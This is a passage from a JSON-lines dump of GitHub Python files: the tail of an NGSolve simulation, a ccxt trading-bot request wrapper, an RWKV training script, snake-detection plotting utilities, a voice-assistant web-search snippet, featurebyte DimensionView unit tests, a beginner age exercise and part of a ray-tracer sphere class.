filename=\"instab/instab\",subdivision=3)\n vtk.Do()\n\ninput(\"Press any key...\")\nt = 0.0\nwith TaskManager():\n while tend < 0 or t < tend - tau / 2:\n print(\"\\nt = {:10.6e}\".format(t))\n t += tau\n print('Assembling a...')\n a.Assemble()\n print('...done')\n\n rhs.data = m.mat * g.vec\n mstar.AsVector().data = m.mat.AsVector() - tau*a.mat.AsVector()\n invmat = mstar.Inverse(fes.FreeDofs())\n g.vec.data = invmat * rhs\n\n # pickout.dump(g.vec.FV().NumPy())\n\n Redraw(blocking=False)\n # if t > 12:\n # input()\n if vtkoutput:\n vtk.Do()\n","repo_name":"jfpxtal/ngsapps","sub_path":"activeparticles/continuum.py","file_name":"continuum.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"19357605262","text":"import time\nimport ccxt\nfrom DataFetch import DataFetch\nfrom Logger import myLogger\nfrom Exchange import Exchange\n\nclass SendRequest: \n def __init__(self, symbol, exchange, amount, logFile, setSandbox = False) -> None:\n self.symbol = symbol\n self.amount = amount\n self.logFile = logFile\n self.exchange = Exchange(exchange, setSandbox)\n self.fetcher = DataFetch(exchange, setSandbox)\n\n \n async def req(self, task, input1=None, input2=None):\n tries = 3\n\n for i in range(tries):\n try:\n if task == \"get_bid_ask_price\":\n ticker = await self.fetcher.fetchTickers(self.symbol)\n return ticker[\"bid\"], ticker[\"ask\"]\n\n elif task == \"get_order\":\n return (await self.fetcher.fetchOrder(input1, input2))[\"info\"]\n \n elif task == \"cancel_order\":\n data = (await self.exchange.cancelOrder(input1, input2))\n if (type(data) is str):\n return \"OrderNotFound\"\n else:\n return data[\"info\"]\n\n elif task == \"place_order\":\n #sendRequest(self,task,input1=side,input2=price)\n side = input1\n price = input2\n orderid=0\n if side ==\"buy\":\n orderid = (await self.exchange.buy(self.symbol, \"limit\", self.amount, price))[\"info\"][\"orderId\"]\n else:\n orderid = (await self.exchange.sell(self.symbol, \"limit\", self.amount, price))[\"info\"][\"orderId\"]\n return orderid\n \n elif task == \"get_balance\":\n return (await self.exchange.getAccountBalance())[\"free\"][input1]\n \n elif task == \"fetch_order_book\":\n return (await self.fetcher.fetchOrderBook(limit=input1, symbol=self.symbol))[input2]\n \n elif task == \"exit_market\":\n coinAccountBalance = (await self.exchange.getAccountBalance())[\"free\"][self.symbol.split(\"/\")[0]]\n ask_price = (await self.fetcher.fetchTickers(self.symbol))[\"ask\"]\n\n if coinAccountBalance <= 0:\n return -1; \n\n orderid = (await self.exchange.sell(self.symbol, \"limit\", coinAccountBalance, ask_price))[\"info\"][\"orderId\"]\n \n return orderid\n elif task == \"enter_market\":\n ask_price = (await self.fetcher.fetchTickers(self.symbol))[\"ask\"]\n orderid = (await self.exchange.buy(self.symbol, \"limit\", self.amount * input1, ask_price))[\"info\"][\"orderId\"]\n \n return orderid\n\n\n else:\n return None\n except ccxt.NetworkError as e:\n if i < tries - 1: # i is zero indexed\n \n myLogger(\"NetworkError , try last \"+str(i) +\"chances\" + str(e), self.logFile)\n time.sleep(0.5)\n continue\n else:\n myLogger(str(e), self.logFile)\n raise\n except ccxt.ExchangeError as e:\n if i < tries - 1: # i is zero indexed\n myLogger(str(e), self.logFile)\n time.sleep(0.5)\n continue\n else:\n myLogger(str(e), self.logFile)\n 
raise","repo_name":"elyskrie21/W3CC-TradingBot","sub_path":"tradebot-mv/tradebot_mv/SendRequest.py","file_name":"SendRequest.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36986197463","text":"from RWKV import RWKVLMHeadModel\n\nimport numpy as np\nimport torch\n\nfrom tqdm import tqdm\nfrom transformers import GPT2TokenizerFast\nfrom datasets import load_dataset\nimport deepspeed\n\ntokenizer = GPT2TokenizerFast.from_pretrained(\"gpt2\", pad_token='<|pad|>', eos_token='<|endoftext|>')\n\n### hyperparameters\n\nvocab_size = tokenizer.vocab_size + 2\nn_layers = 12\nhidden_size = 1024\nlearning_rate = 5e-5\nbatch_size = 32\nmax_len = 256\nnum_epochs = 5\n\nmodel = RWKVLMHeadModel(vocab_size, hidden_size, n_layers).cuda()\n\nprint(\"model parameters: {:_}\".format(sum(p.numel() for p in model.parameters())))\nprint(\"model init done\")\n\nloss_fn = torch.nn.CrossEntropyLoss(ignore_index=tokenizer.pad_token_id)\noptimizer = torch.optim.AdamW(model.parameters(), lr=learning_rate)\n\n# initialize deepspeed\n\ndeepspeed.init_distributed(dist_backend='nccl')\n\n# load the dataset\n\nwikitext = load_dataset('wikitext', 'wikitext-103-v1')['train']['text']\ntrain_dataset = []\nfor sentence in wikitext:\n if len(sentence) > 15:\n train_dataset.append(\"{} {} {}\".format(tokenizer.eos_token, sentence, tokenizer.eos_token))\n\nmodel_engine, optimizer, train_dataloader, _ = deepspeed.initialize(model=model, optimizer=optimizer,\n model_parameters=model.parameters(), config='ds_config.json',\n training_data=train_dataset)\n\n# training loop\n\nfor epoch in range(num_epochs):\n model_engine.train()\n\n # save checkpoint\n torch.save(model.state_dict(), 'checkpoint.pt')\n print('saving checkpoint complete.')\n step = 0\n\n pbar = tqdm(train_dataloader)\n pbar.set_description(\"epoch: {}, loss: {:.4f}\".format(epoch, 0.0))\n for batch in pbar:\n model_engine.zero_grad()\n model_engine.train()\n \n batch = tokenizer(batch, padding='max_length', max_length=max_len,\n truncation=True, return_tensors='pt').input_ids.cuda()\n\n input_ids, labels = batch[:, :-1].contiguous(), batch[:, 1:].contiguous()\n outputs = model_engine(input_ids)\n\n loss = loss_fn(outputs.view(-1, vocab_size), labels.view(-1))\n \n model_engine.backward(loss)\n model_engine.step()\n\n pbar.set_description(\"epoch: {}, loss: {:.4f}\".format(epoch, loss.item()))\n\n step += 1\n if step % 10 == 0:\n model_engine.eval()\n sentence = \"{}\".format(tokenizer.eos_token)\n token = tokenizer(sentence, return_tensors='pt')['input_ids'].cuda()\n print(\n tokenizer.decode(\n model.generate(token, max_len=64)[0].cpu().numpy(),\n skip_special_tokens=True\n )\n )\n\n if step % 100 == 0:\n torch.save(model.state_dict(), 'checkpoint.pt')\n print('saving checkpoint complete.')\n\n### save model\n\ntorch.save(model.state_dict(), 'model.pt')\nprint('saving model complete.')","repo_name":"seung7361/RWKV-Pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"31044253641","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom lib.utils.img_utils import colors\nfrom lib.utils import img_utils\nfrom lib.utils.snake import snake_cityscapes_utils, snake_config\n\n\nR = 8\nGREEN = (18, 127, 15)\nWHITE = (255, 255, 255)\n\n\ndef 
visualize_snake_detection(img, data):\n\n def blend_hm_img(hm, img):\n hm = np.max(hm, axis=0)\n h, w = hm.shape[:2]\n img = cv2.resize(img, dsize=(w, h), interpolation=cv2.INTER_LINEAR)\n hm = np.array([255, 255, 255]) - (hm.reshape(h, w, 1) * colors[0]).astype(np.uint8)\n ratio = 0.5\n blend = (img * ratio + hm * (1 - ratio)).astype(np.uint8)\n return blend\n\n img = img_utils.bgr_to_rgb(img)\n blend = blend_hm_img(data['ct_hm'], img)\n\n plt.imshow(blend)\n ct_ind = np.array(data['ct_ind'])\n w = img.shape[1] // snake_config.down_ratio\n xs = ct_ind % w\n ys = ct_ind // w\n for i in range(len(data['wh'])):\n w, h = data['wh'][i]\n x_min, y_min = xs[i] - w / 2, ys[i] - h / 2\n x_max, y_max = xs[i] + w / 2, ys[i] + h / 2\n plt.plot([x_min, x_min, x_max, x_max, x_min], [y_min, y_max, y_max, y_min, y_min])\n plt.show()\n\n\ndef visualize_cp_detection(img, data):\n act_ind = data['act_ind']\n awh = data['awh']\n\n act_hm_w = data['act_hm'].shape[2]\n cp_h, cp_w = data['cp_hm'][0].shape[1], data['cp_hm'][0].shape[2]\n\n img = img_utils.bgr_to_rgb(img)\n plt.imshow(img)\n\n for i in range(len(act_ind)):\n act_ind_ = act_ind[i]\n ct = act_ind_ % act_hm_w, act_ind_ // act_hm_w\n w, h = awh[i]\n abox = np.array([ct[0] - w/2, ct[1] - h/2, ct[0] + w/2, ct[1] + h/2])\n\n cp_ind_ = data['cp_ind'][i]\n cp_wh_ = data['cp_wh'][i]\n\n for j in range(len(cp_ind_)):\n ct = cp_ind_[j] % cp_w, cp_ind_[j] // cp_w\n x = ct[0] / cp_w * w\n y = ct[1] / cp_h * h\n x_min = (x - cp_wh_[j][0] / 2 + abox[0]) * snake_config.down_ratio\n y_min = (y - cp_wh_[j][1] / 2 + abox[1]) * snake_config.down_ratio\n x_max = (x + cp_wh_[j][0] / 2 + abox[0]) * snake_config.down_ratio\n y_max = (y + cp_wh_[j][1] / 2 + abox[1]) * snake_config.down_ratio\n plt.plot([x_min, x_min, x_max, x_max, x_min], [y_min, y_max, y_max, y_min, y_min])\n\n plt.show()\n\n\ndef visualize_snake_evolution(img, data):\n img = img_utils.bgr_to_rgb(img)\n plt.imshow(img)\n for poly in data['i_gt_py']:\n poly = poly * 4\n poly = np.append(poly, [poly[0]], axis=0)\n plt.plot(poly[:, 0], poly[:, 1])\n plt.scatter(poly[0, 0], poly[0, 1], edgecolors='w')\n plt.show()\n\n\ndef visualize_snake_octagon(img, extreme_points):\n img = img_utils.bgr_to_rgb(img)\n octagons = []\n bboxes = []\n ex_points = []\n for i in range(len(extreme_points)):\n for j in range(len(extreme_points[i])):\n bbox = get_bbox(extreme_points[i][j]*4)\n octagon = snake_cityscapes_utils.get_octagon(extreme_points[i][j]*4)\n bboxes.append(bbox)\n octagons.append(octagon)\n ex_points.append(extreme_points[i][j])\n _, ax = plt.subplots(1)\n ax.imshow(img)\n n = len(octagons)\n for i in range(n):\n x, y, x_max, y_max = bboxes[i]\n ax.add_patch(patches.Polygon(xy=[[x, y], [x, y_max], [x_max, y_max], [x_max, y]], fill=False, linewidth=1,\n edgecolor='r'))\n octagon = np.append(octagons[i], octagons[i][0]).reshape(-1, 2)\n ax.plot(octagon[:, 0], octagon[:, 1])\n ax.scatter(ex_points[i][:, 0] * 4, ex_points[i][:, 1] * 4, edgecolors='w')\n plt.show()\n\n\ndef get_bbox(ex):\n x = ex[:, 0]\n y = ex[:, 1]\n bbox = [np.min(x), np.min(y), np.max(x), np.max(y)]\n return bbox\n","repo_name":"zju3dv/snake","sub_path":"lib/utils/snake/visualize_utils.py","file_name":"visualize_utils.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":1126,"dataset":"github-code","pt":"78"} +{"seq_id":"16554305155","text":"#searching item in net---------------------------------\ndef browser(self):\n speak_text_cmd('What You want to search for...')\n class browser:\n 
website=\"\"\n \n search=browser()\n search.website=speech.recognize_google(audio)\n find=search.website\n \n if len(find.split()) <= 1: \n if(find.endswith(\".com\")):\n wb.open('{}'.format(find), new=3)\n print(\"searching... \",find)\n speak_text_cmd(\"Open the File..\")\n \n elif(find.endswith(\".net\")):\n wb.open('{}'.format(find), new=2)\n print(\"searching... \",find)\n speak_text_cmd(\"Open the File..\")\n \n elif(find.endswith(\".in\")):\n wb.open('{}'.format(find), new=2)\n print(\"searching... \",find)\n speak_text_cmd(\"Open the File..\")\n \n elif(find.endswith(\".org\")):\n wb.open('{}'.format(find), new=2)\n print(\"searching... \",find)\n speak_text_cmd(\"Open the File..\")\n \n else:\n com=find+\".com\"\n wb.open('{}'.format(com), new=2)\n print(\"searching... \",find)\n speak_text_cmd(\"Open the File..\")\n \n else:\n find=(\"https://www.google.com/search?q={}\".format(find))\n wb.open('{}'.format(find),new=2)\n print(\"finding using else\")\n speak_text_cmd(\"Open the File..\")\n \n \n speak_text_cmd()\n","repo_name":"GowthamBA/Voice-Assistant","sub_path":"VoiceAss v1.py","file_name":"VoiceAss v1.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12031349851","text":"\"\"\"\nUnit tests for DimensionView class\n\"\"\"\nimport textwrap\n\nimport pytest\n\nfrom featurebyte.api.dimension_view import DimensionView\nfrom featurebyte.api.feature_list import FeatureList\nfrom featurebyte.enum import DBVarType\nfrom featurebyte.exception import JoinViewMismatchError, RepeatedColumnNamesError\nfrom featurebyte.query_graph.enum import NodeOutputType, NodeType\nfrom tests.unit.api.base_view_test import BaseViewTestSuite, ViewType\nfrom tests.util.helper import check_sdk_code_generation, get_node\n\n\nclass TestDimensionView(BaseViewTestSuite):\n \"\"\"\n DimensionView test suite\n \"\"\"\n\n protected_columns = [\"col_int\"]\n view_type = ViewType.DIMENSION_VIEW\n col = \"cust_id\"\n view_class = DimensionView\n bool_col = \"col_boolean\"\n expected_view_with_raw_accessor_sql = \"\"\"\n SELECT\n \"col_int\" AS \"col_int\",\n \"col_float\" AS \"col_float\",\n \"col_char\" AS \"col_char\",\n \"col_text\" AS \"col_text\",\n \"col_binary\" AS \"col_binary\",\n \"col_boolean\" AS \"col_boolean\",\n CAST(\"event_timestamp\" AS STRING) AS \"event_timestamp\",\n \"cust_id\" AS \"cust_id\",\n (\n \"cust_id\" + 1\n ) AS \"new_col\"\n FROM \"sf_database\".\"sf_schema\".\"dimension_table\"\n LIMIT 10\n \"\"\"\n\n def getitem_frame_params_assertions(self, row_subset, view_under_test):\n assert row_subset.dimension_id_column == view_under_test.dimension_id_column\n\n\ndef test_validate_join(snowflake_dimension_view, snowflake_scd_view):\n with pytest.raises(JoinViewMismatchError):\n snowflake_dimension_view.validate_join(snowflake_scd_view)\n\n # assert that joining with a dimension view has no issues\n snowflake_dimension_view.validate_join(snowflake_dimension_view)\n\n\ndef test_get_join_column(snowflake_dimension_view):\n column = snowflake_dimension_view.get_join_column()\n # col_int is the dimension_id column name used when creating this view fixture\n assert column == \"col_int\"\n\n\ndef test_join_same_rsuffix_multiple_times(snowflake_dimension_view, snowflake_dimension_table):\n \"\"\"\n Test scenario where rsuffix didn't help to resolve repeated columns issue\n \"\"\"\n original_columns = snowflake_dimension_view.columns[:]\n other_view = snowflake_dimension_view[[\"col_text\"]]\n\n 
node_name_before = snowflake_dimension_view.node_name\n joined_view = snowflake_dimension_view.join(other_view, rsuffix=\"_y\")\n assert snowflake_dimension_view.node_name == node_name_before\n assert joined_view.columns == original_columns + [\"col_text_y\"]\n\n with pytest.raises(RepeatedColumnNamesError) as exc:\n joined_view.join(other_view, rsuffix=\"_y\")\n assert \"Duplicate column names ['col_text_y'] found\" in str(exc.value)\n\n joined_again_view = joined_view.join(other_view, rsuffix=\"_z\")\n assert joined_again_view.columns == original_columns + [\"col_text_y\", \"col_text_z\"]\n\n # check SDK code generation\n check_sdk_code_generation(\n snowflake_dimension_view,\n to_use_saved_data=False,\n table_id_to_info={\n snowflake_dimension_table.id: {\n \"name\": snowflake_dimension_table.name,\n \"record_creation_timestamp_column\": snowflake_dimension_table.record_creation_timestamp_column,\n }\n },\n )\n\n\n@pytest.fixture\ndef snowflake_dimension_view_with_entity(\n snowflake_dimension_table, cust_id_entity, mock_api_object_cache\n):\n \"\"\"\n Fixture of a DimensionView with entity tagged\n \"\"\"\n _ = mock_api_object_cache\n snowflake_dimension_table[\"col_int\"].as_entity(cust_id_entity.name)\n view = snowflake_dimension_table.get_view()\n return view\n\n\ndef test_as_features__invalid_column_names(snowflake_dimension_view):\n \"\"\"\n Test as_features() with a missing input column name\n \"\"\"\n with pytest.raises(ValueError) as exc:\n snowflake_dimension_view.as_features([\"non_existing_col\"], [\"feature_name\"])\n assert str(exc.value) == \"Column 'non_existing_col' not found\"\n\n\ndef test_as_features__empty_column_names(snowflake_dimension_view):\n \"\"\"\n Test as_features() with invalid number of feature names provided\n \"\"\"\n with pytest.raises(ValueError) as exc:\n snowflake_dimension_view.as_features([], [])\n assert str(exc.value) == \"column_names is empty\"\n\n\ndef test_as_features__duplicate_feature_names(snowflake_dimension_view):\n \"\"\"\n Test as_features() with duplicate values in feature_names\n \"\"\"\n with pytest.raises(ValueError) as exc:\n snowflake_dimension_view.as_features(\n column_names=[\"col_float\", \"col_text\"],\n feature_names=[\"FloatFeature\", \"FloatFeature\"],\n )\n assert str(exc.value) == \"feature_names contains duplicated value(s)\"\n\n\ndef test_as_features__primary_key_not_entity(snowflake_dimension_view, mock_api_object_cache):\n \"\"\"\n Test as_features() when the primary key in not an entity\n \"\"\"\n _ = mock_api_object_cache\n with pytest.raises(ValueError) as exc:\n snowflake_dimension_view.as_features([\"col_float\", \"col_char\"], [\"col_float\", \"col_char\"])\n assert str(exc.value) == 'Column \"col_int\" is not an entity!'\n\n\ndef test_as_features__with_primary_key_column(\n snowflake_dimension_view_with_entity, snowflake_dimension_table, cust_id_entity\n):\n \"\"\"\n Test calling as_features() when including primary column works correctly\n \"\"\"\n # Set entity\n view = snowflake_dimension_view_with_entity\n entity_column = \"col_int\"\n assert entity_column in view.entity_columns\n\n # Select columns for as_features\n columns = [entity_column, \"col_float\", \"col_char\"]\n feature_names = [\"IntFeature\", \"FloatFeature\", \"CharFeature\"]\n\n feature_group = view.as_features(columns, feature_names)\n assert feature_group.feature_names == [\"IntFeature\", \"FloatFeature\", \"CharFeature\"]\n assert feature_group[\"IntFeature\"].dtype == DBVarType.INT\n assert feature_group[\"FloatFeature\"].dtype == 
DBVarType.FLOAT\n assert feature_group[\"CharFeature\"].dtype == DBVarType.CHAR\n\n float_feature_dict = feature_group[\"CharFeature\"].dict()\n graph_dict = float_feature_dict[\"graph\"]\n float_feature_node_dict = get_node(graph_dict, float_feature_dict[\"node_name\"])\n lookup_node_dict = get_node(graph_dict, \"lookup_1\")\n assert graph_dict[\"edges\"] == [\n {\"source\": \"input_1\", \"target\": \"graph_1\"},\n {\"source\": \"graph_1\", \"target\": \"lookup_1\"},\n {\"source\": \"lookup_1\", \"target\": \"project_1\"},\n ]\n assert float_feature_node_dict == {\n \"name\": \"project_1\",\n \"type\": \"project\",\n \"output_type\": \"series\",\n \"parameters\": {\"columns\": [\"CharFeature\"]},\n }\n assert lookup_node_dict == {\n \"name\": \"lookup_1\",\n \"type\": \"lookup\",\n \"output_type\": \"frame\",\n \"parameters\": {\n \"input_column_names\": [\"col_int\", \"col_float\", \"col_char\"],\n \"feature_names\": [\"IntFeature\", \"FloatFeature\", \"CharFeature\"],\n \"entity_column\": \"col_int\",\n \"serving_name\": \"cust_id\",\n \"entity_id\": cust_id_entity.id,\n \"scd_parameters\": None,\n \"event_parameters\": None,\n },\n }\n\n # check SDK code generation\n dimension_table_columns_info = snowflake_dimension_table.dict(by_alias=True)[\"columns_info\"]\n for feature_name in feature_names:\n check_sdk_code_generation(\n feature_group[feature_name],\n to_use_saved_data=False,\n table_id_to_info={\n snowflake_dimension_table.id: {\n \"name\": snowflake_dimension_table.name,\n \"record_creation_timestamp_column\": snowflake_dimension_table.record_creation_timestamp_column,\n # since the table is not saved, we need to pass in the columns info\n # otherwise, entity id will be missing and code generation will fail in as_features method\n \"columns_info\": dimension_table_columns_info,\n }\n },\n )\n\n\ndef test_as_features__offset_provided_but_ignored(\n snowflake_dimension_view_with_entity, snowflake_dimension_table, cust_id_entity\n):\n \"\"\"\n Test as_features() when offset is provided but ignored\n \"\"\"\n # offset ignored but should not have error\n view = snowflake_dimension_view_with_entity\n feature_group = view.as_features(\n [\"col_float\", \"col_char\"], [\"col_float\", \"col_char\"], offset=\"7d\"\n )\n\n # check SDK code generation\n dimension_table_columns_info = snowflake_dimension_table.dict(by_alias=True)[\"columns_info\"]\n check_sdk_code_generation(\n feature_group[\"col_float\"],\n to_use_saved_data=False,\n table_id_to_info={\n snowflake_dimension_table.id: {\n \"name\": snowflake_dimension_table.name,\n \"record_creation_timestamp_column\": snowflake_dimension_table.record_creation_timestamp_column,\n # since the table is not saved, we need to pass in the columns info\n # otherwise, entity id will be missing and code generation will fail in as_features method\n \"columns_info\": dimension_table_columns_info,\n }\n },\n )\n\n\ndef test_as_feature__not_supported(snowflake_dimension_view_with_entity):\n \"\"\"\n Test calling as_feature() is not supported on a temporary column\n \"\"\"\n view = snowflake_dimension_view_with_entity\n with pytest.raises(ValueError) as exc:\n (view[\"col_float\"] + 123).as_feature(\"col_float_plus_123\")\n assert \"as_feature is only supported for named columns in the View object\" in str(exc.value)\n\n\ndef test_as_feature__special_column(snowflake_dimension_view_with_entity):\n \"\"\"\n Test as_feature() by specifying a special column\n \"\"\"\n # col_int is not allowed in as_features(), but ok in as_feature()\n feature = 
snowflake_dimension_view_with_entity[\"col_int\"].as_feature(\"IntFeature\")\n assert feature.name == \"IntFeature\"\n\n\ndef test_as_feature_same_column_name(\n snowflake_dimension_view_with_entity, snowflake_scd_table, cust_id_entity\n):\n \"\"\"\n Test lookup features with same column name\n \"\"\"\n feature_a = snowflake_dimension_view_with_entity[\"col_float\"].as_feature(\n \"FloatFeatureDimensionView\"\n )\n\n snowflake_scd_table[\"col_text\"].as_entity(cust_id_entity.name)\n scd_view = snowflake_scd_table.get_view()\n feature_b = scd_view[\"col_float\"].as_feature(\"FloatFeatureSCDView\", offset=\"7d\")\n\n new_feature = feature_b == feature_a\n new_feature.name = \"lookup_combined_feature\"\n\n\ndef test_as_target__from_view_column(snowflake_dimension_view_with_entity, cust_id_entity):\n \"\"\"\n Test calling as_target() correctly\n \"\"\"\n view = snowflake_dimension_view_with_entity\n feature = view[\"col_float\"].as_target(\"FloatTarget\", \"1d\")\n assert feature.name == \"FloatTarget\"\n assert feature.dtype == DBVarType.FLOAT\n\n feature_dict = feature.dict()\n graph_dict = feature_dict[\"graph\"]\n float_feature_node_dict = get_node(graph_dict, feature_dict[\"node_name\"])\n lookup_node_dict = get_node(graph_dict, \"lookup_target_1\")\n assert graph_dict[\"edges\"] == [\n {\"source\": \"input_1\", \"target\": \"graph_1\"},\n {\"source\": \"graph_1\", \"target\": \"lookup_target_1\"},\n {\"source\": \"lookup_target_1\", \"target\": \"project_1\"},\n ]\n assert float_feature_node_dict == {\n \"name\": \"project_1\",\n \"type\": \"project\",\n \"output_type\": \"series\",\n \"parameters\": {\"columns\": [\"FloatTarget\"]},\n }\n assert lookup_node_dict == {\n \"name\": \"lookup_target_1\",\n \"type\": NodeType.LOOKUP_TARGET,\n \"output_type\": NodeOutputType.FRAME,\n \"parameters\": {\n \"input_column_names\": [\"col_float\"],\n \"feature_names\": [\"FloatTarget\"],\n \"entity_column\": \"col_int\",\n \"serving_name\": \"cust_id\",\n \"entity_id\": cust_id_entity.id,\n \"scd_parameters\": None,\n \"event_parameters\": None,\n \"offset\": \"1d\",\n },\n }\n\n\ndef test_as_feature__from_view_column(snowflake_dimension_view_with_entity, cust_id_entity):\n \"\"\"\n Test calling as_feature() correctly\n \"\"\"\n view = snowflake_dimension_view_with_entity\n feature = view[\"col_float\"].as_feature(\"FloatFeature\")\n assert feature.name == \"FloatFeature\"\n assert feature.dtype == DBVarType.FLOAT\n\n feature_dict = feature.dict()\n graph_dict = feature_dict[\"graph\"]\n float_feature_node_dict = get_node(graph_dict, feature_dict[\"node_name\"])\n lookup_node_dict = get_node(graph_dict, \"lookup_1\")\n assert graph_dict[\"edges\"] == [\n {\"source\": \"input_1\", \"target\": \"graph_1\"},\n {\"source\": \"graph_1\", \"target\": \"lookup_1\"},\n {\"source\": \"lookup_1\", \"target\": \"project_1\"},\n ]\n assert float_feature_node_dict == {\n \"name\": \"project_1\",\n \"type\": \"project\",\n \"output_type\": \"series\",\n \"parameters\": {\"columns\": [\"FloatFeature\"]},\n }\n assert lookup_node_dict == {\n \"name\": \"lookup_1\",\n \"type\": \"lookup\",\n \"output_type\": \"frame\",\n \"parameters\": {\n \"input_column_names\": [\"col_float\"],\n \"feature_names\": [\"FloatFeature\"],\n \"entity_column\": \"col_int\",\n \"serving_name\": \"cust_id\",\n \"entity_id\": cust_id_entity.id,\n \"scd_parameters\": None,\n \"event_parameters\": None,\n },\n }\n\n\ndef test_multiple_as_feature__same_join(snowflake_dimension_view_with_entity):\n \"\"\"\n Test features created from 
different as_feature call is joined together in sql\n \"\"\"\n view = snowflake_dimension_view_with_entity\n feature_1 = view[\"col_float\"].as_feature(\"FloatFeature\")\n feature_2 = view[[\"col_float\", \"col_char\"]][\"col_char\"].as_feature(\"CharFeature\")\n feature_3_and_4 = view.as_features(\n [\"col_binary\", \"col_boolean\"], [\"BinaryFeature\", \"BoolFeature\"]\n )\n feature_list = FeatureList([feature_1, feature_2, feature_3_and_4], name=\"my_feature_list\")\n feature_list_sql = feature_list.sql\n assert (\n feature_list_sql\n == textwrap.dedent(\n \"\"\"\n WITH _FB_AGGREGATED AS (\n SELECT\n \"T0\".\"_fb_internal_lookup_col_float_project_1\" AS \"_fb_internal_lookup_col_float_project_1\",\n \"T0\".\"_fb_internal_lookup_col_char_project_1\" AS \"_fb_internal_lookup_col_char_project_1\",\n \"T0\".\"_fb_internal_lookup_col_binary_project_1\" AS \"_fb_internal_lookup_col_binary_project_1\",\n \"T0\".\"_fb_internal_lookup_col_boolean_project_1\" AS \"_fb_internal_lookup_col_boolean_project_1\"\n FROM REQUEST_TABLE AS REQ\n LEFT JOIN (\n SELECT\n \"col_int\" AS \"cust_id\",\n \"col_float\" AS \"_fb_internal_lookup_col_float_project_1\",\n \"col_char\" AS \"_fb_internal_lookup_col_char_project_1\",\n \"col_binary\" AS \"_fb_internal_lookup_col_binary_project_1\",\n \"col_boolean\" AS \"_fb_internal_lookup_col_boolean_project_1\"\n FROM (\n SELECT\n \"col_int\" AS \"col_int\",\n \"col_float\" AS \"col_float\",\n \"col_char\" AS \"col_char\",\n \"col_text\" AS \"col_text\",\n \"col_binary\" AS \"col_binary\",\n \"col_boolean\" AS \"col_boolean\",\n \"event_timestamp\" AS \"event_timestamp\",\n \"cust_id\" AS \"cust_id\"\n FROM \"sf_database\".\"sf_schema\".\"dimension_table\"\n )\n ) AS T0\n ON REQ.\"cust_id\" = T0.\"cust_id\"\n )\n SELECT\n \"_fb_internal_lookup_col_float_project_1\" AS \"FloatFeature\",\n \"_fb_internal_lookup_col_char_project_1\" AS \"CharFeature\",\n \"_fb_internal_lookup_col_binary_project_1\" AS \"BinaryFeature\",\n \"_fb_internal_lookup_col_boolean_project_1\" AS \"BoolFeature\"\n FROM _FB_AGGREGATED AS AGG\n \"\"\"\n ).strip()\n )\n\n\ndef test_sdk_code_generation(saved_dimension_table, update_fixtures):\n \"\"\"Check SDK code generation\"\"\"\n to_use_saved_data = True\n dimension_view = saved_dimension_table.get_view()\n check_sdk_code_generation(\n dimension_view,\n to_use_saved_data=to_use_saved_data,\n fixture_path=\"tests/fixtures/sdk_code/dimension_view.py\",\n update_fixtures=update_fixtures,\n table_id=saved_dimension_table.id,\n )\n","repo_name":"featurebyte/featurebyte","sub_path":"tests/unit/api/test_dimension_view.py","file_name":"test_dimension_view.py","file_ext":"py","file_size_in_byte":16326,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"78"} +{"seq_id":"40268473594","text":"\"\"\"\nCreate a program that asks the user to enter their name and their age. \nPrint out a message addressed to them that tells them the year that they \nwill turn 100 years old.\n\nExtras:\n\nAdd on to the previous program by asking the user for another number and \nprinting out that many copies of the previous message. \n(Hint: order of operations exists in Python)\nPrint out that many copies of the previous message on separate lines. \n(Hint: the string \"\\n is the same as pressing the ENTER button)\n\"\"\"\n\ndef main():\n name = input(\"Please input name: \")\n age = int(input(\"Please input age: \"))\n age_100 = 100-age\n times_repeat = int(input(\"How many times would you like this repeated? 
Input Number: \"))\n return name, age, age_100, times_repeat\n\n\nif __name__ == \"__main__\":\n name, age, age_100, times_repeat = main()\n print(f\"{name}, you are {age} years old and will turn 100 in {age_100} years!\\n\"*times_repeat)\n","repo_name":"Charlie-England/python_practice","sub_path":"exercise_1_char_input.py","file_name":"exercise_1_char_input.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12263289654","text":"import math\n\nimport rtPoint\nfrom rtPointFactory import rtPointFactory\nimport rtVector\nfrom matrixTransformationFactory import rtMatrixTransformationFactory\nfrom material import rtMaterial\n\nclass rtSphere(object):\n\n def __init__(self, pRadius=1.0, pOrigin=None, pID='1'):\n\n if pOrigin == None:\n tfac = rtPointFactory()\n self.sOrigin = tfac.newOriginPoint()\n else: \n self.sOrigin = pOrigin\n\n self.sRadius = pRadius\n self.sObjectID = pID\n\n self.sMaterial = rtMaterial()\n self.sMaterial.setDefaultValues()\n \n self.sTransform = rtMatrixTransformationFactory().newIdentity()\n self.sInverseTransform = self.sTransform.inverse()\n\n delta = 0.00001\n if abs(pRadius - 1.0) > delta:\n self.sTransform = rtMatrixTransformationFactory().newScaling( pRadius, pRadius, pRadius )\n self.sInverseTransform = self.sTransform.inverse()\n \n\n def origin(self):\n return self.sOrigin\n \n def radius(self):\n return self.sRadius\n\n def transform(self):\n return self.sTransform\n\n def inverseTransform(self):\n return self.sInverseTransform\n\n def applyTransform(self, pTransform):\n\n self.sTransform = self.sTransform.transform (pTransform)\n self.sInverseTransform = self.sTransform.inverse()\n \n def setMaterial (self, pMaterial):\n self.sMaterial = pMaterial\n \n def getMaterial (self):\n return self.sMaterial\n \n def asText(self):\n return 'Sphere %s' % str(self.sObjectID)\n \n def normalAtObjectPoint(self, objectX, objectY, objectZ):\n\n # return a vector from my centre to the point objectX, objectY, objectZ\n originData = self.sOrigin.getMatrixData()\n\n return rtVector.rtVector(objectX - originData[0][0], objectY - originData[0][1], objectZ - originData[0][2])\n\n def normalAtWorldPoint(self, worldX, worldY, 